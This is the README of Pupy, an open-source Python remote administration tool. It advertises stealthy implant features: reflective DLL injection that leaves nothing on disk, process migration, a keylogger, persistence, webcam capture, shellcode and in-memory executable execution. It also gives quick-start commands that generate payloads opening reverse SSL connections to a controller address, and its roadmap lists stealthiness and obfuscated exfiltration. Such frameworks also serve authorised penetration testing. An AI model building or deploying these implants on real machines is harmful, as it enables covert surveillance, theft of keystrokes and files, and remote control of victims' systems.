# Pupy Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk. ## Features : - On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :) - Pupy can reflectively migrate into other processes - Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented). - modules are quite simple to write and pupy is easily extensible. - Pupy uses [rpyc](https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client - we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works ! - communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future - all the non interactive modules can be dispatched on multiple hosts in one command - Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu) - modules can be executed as background jobs - commands and scripts running on remote hosts are interruptible - auto-completion and nice colored output :-) - commands aliases can be defined in the config ## Implemented Modules : - migrate - inter process architecture injection also works (x86->x64 and x64->x86) - keylogger - persistence - screenshot - webcam snapshot - in memory execution of PE exe both x86 and x64 :) - command execution - download - upload - socks5 proxy - local port forwarding - interactive shell (cmd.exe, /bin/sh, ...) - interactive python shell - shellcode exec (thanks to @byt3bl33d3r) ##Quick start In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1 The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) ### generate/run a payload #### for Windows ```bash ./pupygen.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe ``` you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means. #### for Linux ```bash pip install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443 ``` #### for MAC OS X ```bash easy_install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443 ``` ### start the server 1. eventually edit pupy.conf to change the bind address / port 2. start the pupy server : ```bash ./pupysh.py ``` ### Some screenshots #####list connected clients ![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1") #####help ![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3") #####execute python code on all clients ![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2") #####execute a command on all clients, exception is retrieved in case the command does not exists ![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4") #####use a filter to send a module only on selected clients ![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5") #####migrate into another process ![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6") #####interactive shell ![screenshot7](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/interactive_shell.png "screenshot7") #####interactive python shell ![screenshot8](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/pyshell.png "screenshot8") #####upload and run another PE exe from memory ![screenshot9](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/memory_exec.png "screenshot9") ##Example: How to write a MsgBox module first of all write the function/class you want to import on the remote client in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py ```python import ctypes import threading def MessageBox(text, title): t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0)) t.daemon=True t.start() ``` then, simply create a module to load our package and call the function remotely ```python class MsgBoxPopup(PupyModule): """ Pop up a custom message box """ def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__) self.arg_parser.add_argument('--title', help='msgbox title') self.arg_parser.add_argument('text', help='text to print in the msgbox :)') @windows_only def is_compatible(self): pass def run(self, args): self.client.load_package("pupwinutils.msgbox") self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title) self.log("message box popped !") ``` ## Dependencies rpyc (https://github.com/tomerfiliba/rpyc) ##Roadmap and ideas Some ideas without any priority order - support for https proxy - bind instead of reverse connection - add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc... - integrate scapy in the windows dll :D (that would be fun) - work on stealthiness and modules under unix systems - mic recording - socks5 udp support - remote port forwarding - perhaps write some documentation - The backdoor factory ? - Impacket ? - exfiltration through obfsproxy obfuscated network stream ? - ... - any cool idea ? ## FAQ > Does the server works on windows ? Yes but it has not really been tested and it may be unstable > I can't install it how does it work ? pip install rpyc > hey c4n y0u add a DDOS module plzz? No. ## Contact by mail: contact@n1nj4.eu on Twitter: [Follow me on twitter](https://twitter.com/n1nj4sec) [![Join the chat at https://gitter.im/n1nj4sec/pupy](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/n1nj4sec/pupy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) If some of you want to participate or send me a feedback, don't hesitate :-)